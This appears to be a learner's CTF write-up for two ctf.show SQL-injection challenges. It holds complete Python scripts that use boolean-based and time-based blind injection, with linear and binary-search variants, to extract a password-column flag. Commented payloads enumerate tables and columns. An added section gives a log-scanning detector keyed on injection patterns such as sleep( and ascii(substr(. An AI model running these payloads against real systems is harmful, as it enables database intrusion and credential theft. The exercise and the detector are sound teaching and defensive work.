Because I felt my scripts were badly written and my understanding of binary search was still fuzzy,
mostly, how did I learn Python so badly!!
let me study it again.
174 Boolean-based blind injection
This version does not use binary search:
import requests

url = 'http://e9a1012f-6cb2-451d-9084-0d011dfcff89.challenge.ctf.show/api/v4.php'
flag = ''
# MySQL substr() positions start at 1, so start at 1 rather than 0
# (position 0 returns an empty string and can never match).
for i in range(1, 60):
    # Linear scan over printable ASCII: one request per candidate character.
    for j in range(32, 128):
        payload = f"?id=1' union select 'a',if(ascii(substr((select group_concat(password) from ctfshow_user4 where username='flag'),{i},1))={j},'True','False') --+"
        r = requests.get(url=url+payload).text
        if 'True' in r:
            flag += chr(j)
            print(flag)
            break
Binary search is actually not hard either.
The idea is to first take the midpoint of the range 32..128, which is 80,
then test the range 80..128 first, i.e. check whether "admin" appears in the response.
If it does, continue in 81..128: set low to 81 and take a new midpoint.
If it does not, continue in 32..80: set high to 80 and take a new midpoint.
import requests

url = "http://e9a1012f-6cb2-451d-9084-0d011dfcff89.challenge.ctf.show/api/v4.php"
# {0} = character position, {1} = ASCII bound being tested
payload = "?id=1' and (ascii(substr((select group_concat(password)from ctfshow_user4 where username='flag'),{0},1))>{1})-- +"
flag = ''
for i in range(1, 60):
    high = 128
    low = 32
    mid = (high + low) // 2
    while high > low:
        payload1 = payload.format(i, mid)
        r = requests.get(url=url+payload1).text
        if "admin" in r:
            # condition true: the character is above mid
            low = mid + 1
        else:
            # condition false: the character is at most mid
            high = mid
        mid = (high + low) // 2
    # the loop ends with low == high == mid == the character's ASCII value
    flag += chr(mid)
    print(flag)
175 Time-based blind injection
This version does not use binary search:
import requests
import time

url = 'http://7d8bc038-f515-4177-88d7-4bbcb2db6a54.challenge.ctf.show/api/v5.php'
flag = ''
for i in range(1, 60):
    for j in range(32, 128):
        # sleeps 0.5 s while the character is still above j; the first j that
        # comes back quickly is the character itself
        payload = f"?id=1' and if(ascii(substr((select group_concat(password) from ctfshow_user5 where username='flag'),{i},1))>{j},sleep(0.5),0)--+"
        start_time = time.time()
        r = requests.get(url=url + payload).text
        end_time = time.time()
        if end_time - start_time <= 0.48:
            flag += chr(j)
            print(flag)
            break
The timing here was mainly observed by capturing the request in Burp Suite and looking at the response time.
Here we set the sleep time to 0.5 seconds.
Since we know the first character of the flag is c (ASCII 99), we can see that when the condition holds the response takes about 0.5 seconds,
but when the condition does not hold the response takes about 0.05 seconds.
Below is the binary-search version.
The true/false decision is based on the response time.
import requests
import time

url = "http://7d8bc038-f515-4177-88d7-4bbcb2db6a54.challenge.ctf.show/api/v5.php?id="
# payload = "1' and if(ascii(substr((select database()),{0},1))>{1},sleep(2),1)-- +"
# payload = "1' and if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),{0},1))>{1},sleep(2),1)-- +"
# payload = "1' and if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='ctfshow_user5'),{0},1))>{1},sleep(2),1)-- +"
payload = "1' and if(ascii(substr((select group_concat(password)from ctfshow_user5 where username='flag'),{0},1))>{1},sleep(2),1)-- +"
flag = ''
for i in range(1, 50):
    high = 128
    low = 32
    mid = (high + low) // 2
    while high > mid:  # same as high > low, since mid < high whenever low < high
        payload1 = payload.format(i, mid)
        start_time = time.time()
        r = requests.get(url=url + payload1)
        stop_time = time.time()
        sub = stop_time - start_time
        if sub > 1.8:
            # slow response: sleep(2) fired, so the character is above mid
            low = mid + 1
        else:
            # fast response: the character is at most mid
            high = mid
        mid = (high + low) // 2
    flag += chr(mid)
    print(flag)
When the condition holds, the response takes roughly more than 1.8 seconds,
which means the ASCII value lies above mid (in mid+1..high), so low must be adjusted.
If the condition does not hold, the value lies in low..mid, so high must be adjusted.
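As a defender's counterpart to the two scripts above, here is an added example (not part of the original writeup) that scans access-log lines for the primitives these blind-injection loops rely on (ascii(substr(, sleep() and counts the repeated requests per client; the log lines, timestamps and IP addresses are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format), not real traffic.
# They mimic what the loops above leave behind: the same endpoint hit over and
# over, with only the substr() position and the guessed ASCII bound changing.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /api/v4.php?id=1'%20and%20(ascii(substr((select%20group_concat(password)from%20ctfshow_user4%20where%20username='flag'),1,1))>80)--%20+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /api/v4.php?id=1'%20and%20(ascii(substr((select%20group_concat(password)from%20ctfshow_user4%20where%20username='flag'),1,1))>104)--%20+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /api/v4.php?id=1'%20and%20(ascii(substr((select%20group_concat(password)from%20ctfshow_user4%20where%20username='flag'),1,1))>92)--%20+ HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:12:00:01 +0000] "GET /api/v5.php?id=1'%20and%20if(ascii(substr((select%20group_concat(password)from%20ctfshow_user5%20where%20username='flag'),1,1))>80,sleep(2),1)--%20+ HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:12:00:03 +0000] "GET /api/v5.php?id=1'%20and%20if(ascii(substr((select%20group_concat(password)from%20ctfshow_user5%20where%20username='flag'),1,1))>104,sleep(2),1)--%20+ HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /api/v4.php?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:12:00:04 +0000] "GET /api/v4.php?id=2 HTTP/1.1" 200 512
""".splitlines()

# Fragments the two techniques on this page depend on, matched after decoding.
TIME_PRIMITIVES = ("sleep(", "benchmark(")
BOOLEAN_PRIMITIVES = ("ascii(substr(", "union select")

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<path>\S+)')

def classify(line):
    """Return (client_ip, kind) for one log line, kind in {'time', 'boolean', None}.
    The query string is percent-decoded and lower-cased first, because the
    scripts send spaces as %20 and SQL keywords are case-insensitive."""
    m = LOG_RE.match(line)
    if not m:
        return None, None
    query = unquote_plus(m.group("path").partition("?")[2]).lower()
    if any(p in query for p in TIME_PRIMITIVES):
        return m.group("ip"), "time"   # checked first: time payloads also contain ascii(substr(
    if any(p in query for p in BOOLEAN_PRIMITIVES):
        return m.group("ip"), "boolean"
    return m.group("ip"), None

def suspicious_clients(lines, threshold=2):
    """Count flagged requests per (client_ip, kind). A blind-injection loop
    produces dozens of such requests per second (about 7 per character with
    binary search, up to 96 without), so even a low threshold separates it
    from a one-off probe. Returns {(ip, kind): count} for counts >= threshold."""
    counts = Counter()
    for line in lines:
        ip, kind = classify(line)
        if kind is not None:
            counts[(ip, kind)] += 1
    return {key: n for key, n in counts.items() if n >= threshold}
```

In a real deployment the same two functions would run over the web server's actual access log, and a log format that records response time would additionally expose the time-based variant through its constant ~2 s latency.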